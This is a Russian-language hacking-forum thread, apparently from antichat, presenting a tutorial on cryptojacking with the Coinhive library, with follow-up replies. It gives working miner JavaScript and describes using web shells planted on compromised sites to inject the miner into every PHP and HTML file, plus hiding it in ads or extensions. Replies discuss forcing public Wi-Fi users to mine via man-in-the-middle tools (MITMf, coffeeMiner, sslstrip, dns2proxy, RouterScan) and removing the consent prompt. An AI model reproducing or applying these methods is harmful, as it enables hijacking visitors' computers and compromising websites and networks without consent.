https://forum.antichat.xyz/attachments/4795892/img_3274ab0678.png

Майнинг, также добыча— деятельность по поддержанию распределённой платформы и созданию новых блоков с возможностью получить вознаграждение в форме новых единиц и комиссионных сборов в различных криптовалютах, в частности в Биткойн.
Coin-hive.com - это сайт, который предлагает вебмастеру встроить в свой сайт утилиту для майнинга биткоинов.

Типичная майнинг-ферма – это высокопроизводительный компьютер с несколькими видеокартами. На первый взгляд кажется, что все просто: подключаешь компьютер к сети, настраиваешь и наблюдаешь, как он зарабатывает деньги.

Вместо того, чтобы создавать ферму из наших видеокарт, мы будем использовать мощность посетителей сайтов. Мы вставим javascript код на все страницы нашего сайта. Для майнинга криптовалюты мы будем использовать библиотеку coinhive.

JavaScript:






Дальше идет основная часть нашего кода. В ней мы указываем ключ XXXX и имя, которое будет отображаться у нас на странице. Потом мы указываем кол-во потоков, крайне важно, чтобы число потоков не превышало 8 или 16. Далее скрипт вывод в console.log информацию о нашем хэшах.

Подробнее с функциями библиотеки можно ознакомиться здесь.

Код:




var miner = new CoinHive.User("XXXX", "Test");
miner.start();

setInterval( function() {
miner.setNumThreads(8);
miner.setThrottle(0.5);

console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " + miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
}, 1000);



Допустим мы имеем доступ ко множеству сайтов, где у нас установлен web-shell: https://pastebin.com/ycSazL8B
Регистрируемся на coinhive, получаем ключ и вставляем его в javascript код. В полуinfection указываем каталог, в файлы которого будет вставлен майнер. Шелл вставит вредоносный скрипт только в файлы имеющие расширение php или html.

https://forum.antichat.xyz/attachments/4795892/1515879688832.png

Сколько мы получаем хэшей можно посмотреть в консоли. Чем больше на сайте будет посетителей, чем больше хэшей вы получите. Еще как один из вариантов код майнера можно вставить в рекламу или расширение для браузера.

SooLFaa сказал(а):

Запрещено:
1) Разглашение любой информации данной секции;

При редактировании статьи кое-где допустил ошибки...



mrOkey сказал(а):



SooLFaa сказал(а):

Запрещено:
1) Разглашение любой информации данной секции;




Никакого раскрытия информации не было, статью я написал сам и она отличается от той, что находится в gray section. Две разные статьи на 1 тему.

принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)

DefWolf сказал(а):

Никакой раскрытии информации не было, статью я написал сам и она отличается от той, что находится в gray time. Две разные статьи на 1 тему.


это и есть раскрытие))

ребят, вопрос: как вставляется JS код на сайт, сразу выскакивает сообщение, типа "Мол, разреши использовать данному сайту вычислительные мощности твоего компьютера..". Вопрос: это убрать, что бы тупо прямо сразу начался майнинг при заходе на сайт, без оповещения?

linked3234 сказал(а):

как вставляется JS код на сайт


все же написано....



linked3234 сказал(а):

Вопрос: это убрать, что бы тупо прямо сразу начался майнинг


никак... антивирус, вроде блокирует такие js https://hashkiller.co.uk/md5-decrypter.aspx <--вот пример)

Ondrik8 сказал(а):

принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)


Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner

mrOkey сказал(а):

это и есть раскрытие))


Глупо, каждый раз сверять темы с gray time, при написании статьи, да и даже если сверить, то статьи на одинаковою тему отличаются

DefWolf сказал(а):

сверять темы


глупо постить одно и то же, а сверять довольно полезно

mrOkey сказал(а):

глупо постить одно и то же, а сверять довольно полезно


Постить для тех у кого нет доступа в gray time ? С более раскрытой темой ?

DefWolf сказал(а):

Постить для тех у кого нет доступа в gray time ? С более раскрытой темой ?


ну я и говорю, что ты раскрыл инфу

mrOkey сказал(а):

ну я и говорю, что ты раскрыл инфу


Я раскрыл тему, а не иформацию, которая содержится в той статье. Решать администрации

DefWolf сказал(а):

Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner

знаю.. в понедельник писал про нее но она не сохранилась, так же как и моя важная переписка((с конфиденц. данными(

Ondrik8 сказал(а):

знаю.. в понедельник писал про нее но она не сохранилась, так же как и моя важная переписка((с конфиденц. данными(


я кстати успел прочитать)

Ondrik8 сказал(а):

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)


80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.

Dr.Lafa сказал(а):

80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.


Тем более уже давно в публичном wifi стоит защита от MITM атаках

DefWolf сказал(а):

Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner

Тестировал на днях данный инструмент. У него есть один минус: скрипт с майнером внедряется не во все страницы.



Dr.Lafa сказал(а):

80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.


На самом деле, можно поднять sslstrip + dns2proxy и частично это решит проблему с SSL.

Acrono сказал(а):

Тестировал на днях данный инструмент. У него есть один минус: скрипт с майнером внедряется не во все страницы.

На самом деле, можно поднять sslstrip + dns2proxy и частично это решит проблему с SSL.


А стоит ли так париться если шанс, что инструмент принесет пользу довольно низкий

DefWolf сказал(а):

А стоит ли так париться если шанс, что инструмент принесет пользу довольно низкий


Если автоматизировать RouterScan + binwalk + coffeeMiner, то возможно это может принести пользу/выгоду.

Acrono сказал(а):

На самом деле, можно поднять sslstrip + dns2proxy и частично это решит проблему с SSL.


Не решит, если сидеть с приложения, а не через рбаузер

Dr.Lafa сказал(а):

Не решит, если сидеть с приложения, а не через рбаузер


Согласен, но про приложения никто и не говорил.